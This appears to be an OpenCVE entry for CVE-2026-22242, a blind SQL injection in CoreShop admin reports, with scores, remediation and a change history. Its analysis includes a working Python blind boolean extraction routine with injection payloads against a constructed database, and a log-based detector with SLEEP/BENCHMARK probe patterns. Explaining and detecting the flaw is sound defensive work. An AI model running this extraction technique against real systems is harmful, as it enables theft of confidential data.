Description
CoreShop is a Pimcore enhanced eCommerce solution. Prior to version 4.1.8, a blind SQL injection vulnerability exists in the application that allows an authenticated administrator-level user to extract database contents using boolean-based or time-based techniques. The database account used by the application is read-only and non-DBA, limiting impact to confidential data disclosure only. No data modification or service disruption is possible. This issue has been patched in version 4.1.8.
Published: 2026-01-08
Score: 4.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Database Confidentiality Disclosure
Action: Patch Immediately
AI Analysis

Impact

The vulnerability is a blind SQL injection in the admin reports of CoreShop before version 4.1.8. An authenticated administrator can use boolean-based or time-based techniques to read arbitrary database contents through the application's database connection. Because that connection uses a read-only, non-DBA account, an attacker cannot modify data or disrupt service; the risk is disclosure of confidential data (customer, order and configuration records the account can read).

Affected Systems

The affected product is CoreShop (vendor: coreshop). All releases prior to 4.1.8 are vulnerable; the fix shipped in 4.1.8. No other products or version ranges are listed as affected.

Risk and Exploitability

The CVSS 3.1 score of 4.9 (vector AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N) places the vulnerability in the medium range: it is reachable over the network with low complexity, but requires high privileges, and its impact is confined to confidentiality. The EPSS score of less than 1% indicates a very low likelihood of exploitation in the wild, and the flaw is not listed in CISA's Known Exploited Vulnerabilities catalog; the SSVC assessment records a public proof of concept ("Exploitation: poc") but rates the attack as not automatable. The attack requires administrator credentials, so the realistic threat is an insider or a compromised admin account that repeatedly submits crafted report queries and reads data one bit at a time from the true/false or fast/slow behaviour of the response. No data modification or service disruption is possible from this vector.
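To make the boolean-based technique described in the Impact and Risk sections concrete, the following Python example is added here; it is not CoreShop's code, and the page does not identify the injectable report parameter, so the schema, the report filter and the secret are constructed for the demo. A hypothetical report splices a user-supplied status into its WHERE clause and returns only a row count, which is all a read-only account needs to leak data: `extract` recovers a secret one character at a time from the non-zero/zero signal, while the parameterised `report_fixed` gives the same probes nothing. SQLite's `unicode()`/`substr()` stand in for MySQL's `ASCII()`/`SUBSTRING()`.

```python
import sqlite3

# Constructed demo data; not CoreShop's schema. The attacker's goal is to read
# SECRET_VALUE through a report that only exposes a row count.
SECRET_VALUE = "s3cr3t"


def make_db():
    """Build an in-memory SQLite database with a constructed shop-like schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER, status TEXT, total REAL)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)",
                     [(1, "paid", 10.0), (2, "open", 5.0), (3, "paid", 7.5)])
    conn.execute("CREATE TABLE admin_secrets (name TEXT, value TEXT)")
    conn.execute("INSERT INTO admin_secrets VALUES ('api_key', ?)", (SECRET_VALUE,))
    return conn


def report_vulnerable(conn, status):
    """Hypothetical report filter: the status value is spliced into the SQL text."""
    sql = f"SELECT COUNT(*) FROM orders WHERE status = '{status}'"
    return conn.execute(sql).fetchone()[0]


def report_fixed(conn, status):
    """Same report with a bound parameter; the value cannot alter the query."""
    sql = "SELECT COUNT(*) FROM orders WHERE status = ?"
    return conn.execute(sql, (status,)).fetchone()[0]


def extract(conn, report, subquery, max_len=32):
    """Blind boolean extraction of the scalar returned by `subquery`.

    Each probe closes the string literal, appends a condition and re-balances
    the quotes. The report's row count (non-zero or zero) is the one-bit
    oracle; a binary search over the code point costs 7 probes per character.
    Returns (recovered_string, number_of_probes).
    """
    probes = []

    def ask(condition):
        payload = f"paid' AND ({condition}) AND 'a'='a"
        probes.append(payload)
        return report(conn, payload) > 0

    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop when the secret has no character at this position.
        if not ask(f"LENGTH(({subquery})) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"UNICODE(SUBSTR(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered, len(probes)


if __name__ == "__main__":
    target = "SELECT value FROM admin_secrets WHERE name = 'api_key'"
    print(extract(make_db(), report_vulnerable, target))  # recovers the secret
    print(extract(make_db(), report_fixed, target))       # recovers nothing
```

The probe count is what a defender can see: reading a six-character value costs 49 report requests from one admin session, each differing only in a numeric literal, which is the footprint the monitoring advice below is meant to catch.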

Generated by OpenCVE AI on April 18, 2026 at 07:43 UTC.

Remediation

Vendor fix: upgrade to CoreShop 4.1.8 or later, which patches the injection (see GHSA-ch7p-mpv4-4vg4 under Advisories). No separate workaround is published.

OpenCVE Recommended Actions

  • Upgrade CoreShop to version 4.1.8 or later to eliminate the SQL injection flaw.
  • Limit administrator account privileges and apply the principle of least privilege when creating admin users.
  • Enable query logging on the database (Pimcore runs on MySQL/MariaDB, so the general or slow query log) and monitor for bursts of near-identical report queries from one session that differ only in a literal, and for queries calling SLEEP() or BENCHMARK(), which are the footprints of boolean-based and time-based extraction respectively.
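As an added example of the monitoring recommended above (not CoreShop's or OpenCVE's own tooling), the following Python scans MySQL general_log lines for the two blind-SQLi signals: queries that call SLEEP() or BENCHMARK(), and bursts of near-identical queries from one connection that differ only in a literal, which is what a boolean-based extraction loop leaves behind. The log lines, thread ids, table names and the burst threshold are constructed assumptions for the demo; tune the threshold and window to your own traffic.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed MySQL general_log lines standing in for what a Pimcore/CoreShop
# database would write with general_log=ON. Table names are not CoreShop's;
# thread 17 runs a boolean probe loop, thread 23 a time-based probe, and
# thread 31 is ordinary traffic that must not alert.
SAMPLE_LOG = """\
2026-01-08T10:00:00.000000Z   17 Query SELECT COUNT(*) FROM orders WHERE state = 'complete'
2026-01-08T10:00:01.000000Z   17 Query SELECT COUNT(*) FROM orders WHERE state = 'complete' AND (ASCII(SUBSTRING((SELECT secret FROM vault LIMIT 1),1,1)) > 64) AND 'a'='a'
2026-01-08T10:00:02.000000Z   17 Query SELECT COUNT(*) FROM orders WHERE state = 'complete' AND (ASCII(SUBSTRING((SELECT secret FROM vault LIMIT 1),1,1)) > 96) AND 'a'='a'
2026-01-08T10:00:03.000000Z   17 Query SELECT COUNT(*) FROM orders WHERE state = 'complete' AND (ASCII(SUBSTRING((SELECT secret FROM vault LIMIT 1),1,1)) > 112) AND 'a'='a'
2026-01-08T10:00:04.000000Z   17 Query SELECT COUNT(*) FROM orders WHERE state = 'complete' AND (ASCII(SUBSTRING((SELECT secret FROM vault LIMIT 1),1,1)) > 120) AND 'a'='a'
2026-01-08T10:00:05.000000Z   17 Query SELECT COUNT(*) FROM orders WHERE state = 'complete' AND (ASCII(SUBSTRING((SELECT secret FROM vault LIMIT 1),1,1)) > 116) AND 'a'='a'
2026-01-08T10:00:09.000000Z   23 Query SELECT COUNT(*) FROM orders WHERE state = 'complete' AND (SELECT SLEEP(5)) AND 'a'='a'
2026-01-08T10:00:10.000000Z   31 Query SELECT id, total FROM orders WHERE id = 4711
2026-01-08T10:00:11.000000Z   31 Query SELECT id, total FROM orders WHERE id = 4712
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
TIME_RE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)
STR_RE = re.compile(r"'(?:[^']|'')*'")   # single-quoted string literals
NUM_RE = re.compile(r"\b\d+\b")          # bare integer literals


def parse(log_text):
    """Yield (timestamp, thread_id, sql) for each 'Query' line in the log."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00"))
        yield ts, int(m.group(2)), m.group(3).strip()


def template(sql):
    """Normalise a query so probes that differ only in literals compare equal."""
    t = STR_RE.sub("'S'", sql)
    t = NUM_RE.sub("N", t)
    return " ".join(t.split()).upper()


def detect(log_text, burst=5, window_s=60):
    """Return alerts for time-based probes and per-thread boolean probe bursts."""
    alerts = []
    seen = defaultdict(list)  # (thread, template) -> timestamps inside the window
    for ts, thread, sql in parse(log_text):
        if TIME_RE.search(sql):
            alerts.append({"kind": "time_based", "thread": thread, "query": sql})
        key = (thread, template(sql))
        hits = seen[key]
        hits.append(ts)
        # Drop timestamps that fell out of the sliding window.
        while hits and (ts - hits[0]).total_seconds() > window_s:
            hits.pop(0)
        if len(hits) == burst:  # fire once when the threshold is reached
            alerts.append({"kind": "boolean_based", "thread": thread,
                           "count": burst, "template": key[1]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The boolean rule keys on (connection, normalised query) rather than on SQL keywords, so it also catches extraction loops that avoid the obvious SUBSTRING/ASCII functions; the cost is that legitimate batch jobs issuing many parameter-only variants of one query will need an allow-list.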


Tracking


Advisories
Source        ID                    Title
GitHub GHSA   GHSA-ch7p-mpv4-4vg4   CoreShop Vulnerable to SQL Injection via Admin Reports
History

Mon, 12 Jan 2026 16:45:00 +0000

Type                  Values Removed   Values Added
First Time appeared                    Coreshop
                                       Coreshop coreshop
Weaknesses                             CWE-89
CPEs                                   cpe:2.3:a:coreshop:coreshop:*:*:*:*:*:*:*:*
Vendors & Products                     Coreshop
                                       Coreshop coreshop

Thu, 08 Jan 2026 18:15:00 +0000

Type      Values Removed   Values Added
Metrics                    ssvc
                           {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 08 Jan 2026 10:15:00 +0000

Type          Values Removed   Values Added
Description                    CoreShop is a Pimcore enhanced eCommerce solution. Prior to version 4.1.8, a blind SQL injection vulnerability exists in the application that allows an authenticated administrator-level user to extract database contents using boolean-based or time-based techniques. The database account used by the application is read-only and non-DBA, limiting impact to confidential data disclosure only. No data modification or service disruption is possible. This issue has been patched in version 4.1.8.
Title                          CoreShop Vulnerable to SQL Injection via Admin Reports
Weaknesses                     CWE-564
References
Metrics                        cvssV3_1
                               {'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-01-08T14:26:19.902Z

Reserved: 2026-01-07T05:19:12.920Z

Link: CVE-2026-22242

Vulnrichment

Updated: 2026-01-08T14:26:10.948Z

NVD

Status : Analyzed

Published: 2026-01-08T10:15:56.127

Modified: 2026-01-12T16:42:51.783

Link: CVE-2026-22242

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T07:45:24Z

Weaknesses